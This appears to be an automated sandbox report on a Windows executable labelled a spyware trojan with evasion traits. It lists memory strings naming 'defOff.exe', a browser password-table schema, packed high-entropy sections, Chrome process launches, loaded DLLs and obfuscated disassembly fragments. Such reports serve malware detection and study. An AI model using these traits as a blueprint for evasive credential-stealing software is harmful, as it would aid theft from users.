          Source: file.exe, 00000003.00000003.1697966000.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1702878676.0000000005B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1690579292.0000000005702000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1707184151.0000000005B0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1690579292.00000000057DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1708410507.0000000005B03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1704256356.0000000005DAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1703876787.0000000005B10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000002.1849275892.00000000054B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1701651452.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1701392206.0000000005DB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1695170048.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1708666527.0000000005B02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1699886281.0000000005DAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1703035866.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1696756627.0000000005BC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1697087648.0000000005BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1703271362.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000002.1851528154.0000000005DA4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1700013648.0000000005B0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1705039933.0000000005B05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1700481775.0000000005B03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1691671904.0000000005B03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1690579292.000000000576F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1702515462.0000000005B06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1689312244.00000000055EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1743248030.0000000005554000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1689312244.0000000005588000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1697299057.0000000005B0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1707479169.0000000005B0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1743053124.0000000005588000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1699228560.0000000005DA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1703620703.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1706389835.0000000005DA4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1707951060.0000000005DA5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1700367876.0000000005DA5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1700886330.0000000005B04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1691521328.0000000005B94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1696969366.0000000005B0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1697192697.0000000005DB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1689312244.0000000005655000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1695282520.0000000005B09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1704507304.0000000005DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1708524276.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000002.1849275892.00000000054A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1707631290.0000000005DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1688995688.0000000005588000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1695627131.0000000005BA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1696644787.0000000005B03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1691402565.0000000005B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1708938533.0000000005B02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1698763844.0000000005DA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000002.1852648161.0000000006056000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1688854154.0000000005630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1708249777.0000000005DAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1691283388.0000000005DB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1697639275.0000000005BCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1702322753.0000000005DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1696134987.0000000005B0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1699039841.0000000005B10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1703485842.0000000005DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1704725084.0000000005B10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1697845713.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1743004645.0000000005702000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000003.00000003.1704378750.0000000005B0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: Section: ZLIB complexity 0.998124482615894
          Source: file.exeStatic PE information: Section: avuktrbe ZLIB complexity 0.9943881462597832
          Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
          Source: file.exe, 00000003.00000002.1851528154.0000000005F2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.1852726936.00000000061E0000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: .vbpO
          Source: file.exe, 00000003.00000002.1851528154.0000000005F2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: XC.vbP
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/70@19/7
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exe, 00000003.00000003.1424317121.000000000542B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1456028104.0000000005429000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1423296922.0000000005448000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: file.exeReversingLabs: Detection: 47%
          Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1900,i,6270560810318321206,4862603060177102708,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1988,i,9570468939057985229,18284962801725825015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1900,i,6270560810318321206,4862603060177102708,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1988,i,9570468939057985229,18284962801725825015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
          Source: Google Drive.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: YouTube.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Sheets.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Gmail.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Slides.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Docs.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: file.exeStatic file information: File size 1871360 > 1048576
          Source: file.exeStatic PE information: Raw size of avuktrbe is bigger than: 0x100000 < 0x19f400
          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000003.00000003.1738564661.0000000008160000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000003.00000002.1852612854.0000000006052000.00000040.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 3.2.file.exe.bc0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avuktrbe:EW;hcoakmjd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avuktrbe:EW;hcoakmjd:EW;.taggant:EW;
          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
          Source: file.exeStatic PE information: real checksum: 0x1cdf5e should be: 0x1d557d
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: avuktrbe
          Source: file.exeStatic PE information: section name: hcoakmjd
          Source: file.exeStatic PE information: section name: .taggant
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E3F6A push eax; mov dword ptr [esp], edx3_2_061E74D5
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E3F6A push 07DF23FBh; mov dword ptr [esp], ecx3_2_061E74E0
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E3F6A push esi; mov dword ptr [esp], ecx3_2_061E763B
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E8E14 push ecx; mov dword ptr [esp], 07927FC1h3_2_061EA418
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E8E14 push ebp; mov dword ptr [esp], edx3_2_061EA4A9
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E8E14 push 1D2296F7h; mov dword ptr [esp], esp3_2_061EA4B1
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061EF615 push 3F011D00h; mov dword ptr [esp], ecx3_2_061EF840
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061F2610 push ebx; mov dword ptr [esp], eax3_2_061F27A1
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061F2610 push esi; mov dword ptr [esp], ebp3_2_061F27A5
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E8E0D push ebp; mov dword ptr [esp], edi3_2_061EAC47
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E2E09 push 3133A848h; mov dword ptr [esp], esp3_2_061E3E9A
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E2E31 push 1F8E6796h; mov dword ptr [esp], esi3_2_061E712F
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E4E22 push ecx; mov dword ptr [esp], edx3_2_061E4E23
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E3E5F push eax; mov dword ptr [esp], ebx3_2_061E3E75
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E3644 push ebx; mov dword ptr [esp], 66FBD3FEh3_2_061E3645
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E8E7F push 71E06B91h; mov dword ptr [esp], edx3_2_061E8E92
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E8E7F push ecx; mov dword ptr [esp], edx3_2_061EA100
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061EBE60 push ebp; ret 3_2_061EBE6F
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E469F push edx; mov dword ptr [esp], 4B09CE24h3_2_061E4D34
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E669A push 351C3191h; mov dword ptr [esp], eax3_2_061E66AD
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E669A push esi; mov dword ptr [esp], ecx3_2_061E7C1C
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E8E9A push ebx; mov dword ptr [esp], esp3_2_061EA877
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E468E push 242D0864h; mov dword ptr [esp], ecx3_2_061E7E48
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061EBE86 push ebx; ret 3_2_061EBE95
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E2E87 push ebp; mov dword ptr [esp], eax3_2_061E2E95
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E3E81 push 0B451195h; mov dword ptr [esp], ecx3_2_061E819D
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061EBEA4 push eax; ret 3_2_061EBEB3
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E36A1 push 5FFA38BBh; mov dword ptr [esp], esi3_2_061E36A6
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E36A1 push ebx; mov dword ptr [esp], edi3_2_061E37D7
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E96D8 push 43D0BF81h; mov dword ptr [esp], edx3_2_061E96EF
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061E76D6 push 213FB3FDh; mov dword ptr [esp], eax3_2_061E76DE
          Source: file.exeStatic PE information: section name: entropy: 7.967768582500497
          Source: file.exeStatic PE information: section name: avuktrbe entropy: 7.954201496831324

          Boot Survival

          barindex
